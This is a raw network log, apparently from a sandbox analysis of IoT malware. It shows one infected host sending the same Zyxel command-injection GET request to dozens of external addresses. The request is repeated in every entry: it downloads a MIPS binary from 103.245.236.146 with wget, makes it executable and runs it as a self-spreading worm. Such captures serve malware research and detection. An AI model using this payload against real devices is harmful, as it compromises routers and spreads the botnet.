                                                        Jan 28, 2024 10:13:10.742821932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8922192.168.2.144541612.179.185.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742866039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8923192.168.2.143854480.72.63.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742896080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8924192.168.2.1457732102.130.209.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742918968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8925192.168.2.1436850163.113.191.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.742974043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8926192.168.2.145864624.140.112.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743017912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8927192.168.2.1459144139.80.22.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743066072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8928192.168.2.1457990109.128.171.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743109941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8929192.168.2.1443558158.7.86.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743128061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8930192.168.2.145786864.173.79.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743164062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8931192.168.2.1457318189.133.11.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743185043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8932192.168.2.145211478.156.83.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743215084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8933192.168.2.144464060.119.22.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743253946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8934192.168.2.144778671.44.240.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743298054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8935192.168.2.1448256152.93.120.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743344069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8936192.168.2.1446664211.221.162.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743376017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8937192.168.2.145333265.78.138.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743419886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8938192.168.2.145500839.193.249.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743464947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8939192.168.2.1434710130.125.13.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743499994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8940192.168.2.1445828147.88.243.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743505955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8941192.168.2.1439058171.54.110.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743546009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8942192.168.2.1434180117.182.117.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743580103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8943192.168.2.145610449.115.201.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743602991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8944192.168.2.1451850129.17.47.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743659019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8945192.168.2.143978219.209.79.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743693113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8946192.168.2.1454516197.5.237.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743731022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8947192.168.2.1443642223.127.191.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743763924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8948192.168.2.143286082.213.17.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743808031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8949192.168.2.144620286.25.12.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743855953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8950192.168.2.1460954129.145.93.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743879080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8951192.168.2.1455174222.133.190.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743910074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8952192.168.2.1445258207.68.120.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.743947029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8953192.168.2.143871693.44.61.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744002104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8954192.168.2.1438294112.14.146.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744041920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8955192.168.2.1457972174.16.8.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744059086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8956192.168.2.1442528220.14.168.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744112015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8957192.168.2.1443654106.197.194.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744155884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8958192.168.2.1441210186.64.206.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744191885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8959192.168.2.144793680.11.212.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744232893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8960192.168.2.1444714105.166.78.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744285107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8961192.168.2.145275666.47.76.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744308949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8962192.168.2.1450840105.144.241.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744349957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8963192.168.2.1456278128.52.202.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744375944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8964192.168.2.1436894110.52.121.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744430065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8965192.168.2.145823293.9.122.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744462967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8966192.168.2.14405608.27.56.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744493008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8967192.168.2.1437320122.190.134.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744544983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8968192.168.2.145576623.180.84.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744544983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8969192.168.2.1457274109.85.133.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744615078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8970192.168.2.144890090.53.42.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744652033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8971192.168.2.1438440191.123.139.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744690895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8972192.168.2.145415057.255.121.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744716883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8973192.168.2.1458850155.148.2.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744746923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8974192.168.2.1436330223.143.59.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744775057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8975192.168.2.143664827.146.97.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744822979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8976192.168.2.143318667.175.74.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744862080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8977192.168.2.1446980163.76.104.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744911909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8978192.168.2.1439274203.57.222.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744944096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8979192.168.2.143832020.27.98.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.744981050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8980192.168.2.1443270113.244.42.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745028973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8981192.168.2.1456584130.199.174.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.745055914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8982192.168.2.1448032158.150.12.151443
                                                        TimestampBytes transferredDirectionData
